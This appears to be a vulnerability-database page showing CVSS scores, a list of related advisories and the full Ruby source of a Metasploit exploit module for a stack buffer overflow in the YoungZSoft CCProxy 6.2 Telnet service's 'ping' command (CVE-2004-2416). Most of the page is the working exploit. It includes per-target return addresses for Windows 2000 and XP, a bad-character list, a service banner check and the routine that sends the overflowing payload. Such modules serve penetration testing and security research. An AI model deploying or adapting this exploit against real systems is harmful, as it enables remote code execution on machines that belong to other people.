Lucene search
HistorySep 09, 2007 - 10:39 p.m.
CCProxy Telnet Proxy Ping Overflow
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service. The stack is overwritten when sending an overly long address to the ‘ping’ command.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CCProxy Telnet Proxy Ping Overflow',
'Description' => %q{
This module exploits the YoungZSoft CCProxy <= v6.2 suite
Telnet service. The stack is overwritten when sending an overly
long address to the 'ping' command.
},
'Author' => [ 'aushack' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2004-2416' ],
[ 'OSVDB', '11593' ],
[ 'BID', '11666' ],
[ 'EDB', '621' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1012,
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
},
'Platform' => ['win'],
'Targets' =>
[
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
],
'DisclosureDate' => '2004-11-11'))
register_options(
[
Opt::RPORT(23),
])
end
def check
connect
banner = sock.get_once || ''
disconnect
if banner.to_s =~ /CCProxy Telnet Service Ready/
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
sock.put(sploit + "\r\n")
handler
disconnect
end
end
Related
nessus
nessus
CCProxy Logging Compoent HTTP GET Request Remote Overflow
2004-11-20 00:00:00
zdt
zdt
CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit (meta)
2007-09-03 00:00:00
packetstorm
packetstorm
ccproxy-meta.txt
2007-09-05 00:00:00
CCProxy <= v6.2 Telnet Proxy Ping Overflow
2009-11-26 00:00:00
nvd
nvd
CVE-2004-2416
2004-12-31 05:00:00
CVE-2004-2685
2004-12-31 05:00:00
cvelist
cvelist
CVE-2004-2416
2005-08-18 04:00:00
CVE-2004-2685
2007-09-06 19:00:00
exploitdb
exploitdb
CCProxy <= 6.2 - Telnet Proxy Ping Overflow
2010-04-30 00:00:00
CCProxy Log - Remote Stack Overflow
2004-11-09 00:00:00
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)
2007-09-03 00:00:00
checkpoint_advisories
checkpoint_advisories
CCProxy Telnet Ping Hostname Buffer Overflow - Ver2 (CVE-2004-2416)
2015-05-18 00:00:00
cve
cve
CVE-2004-2416
2005-08-18 04:00:00
CVE-2004-2685
2007-09-06 19:00:00
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Related for MSF:EXPLOIT-WINDOWS-PROXY-CCPROXY_TELNET_PING-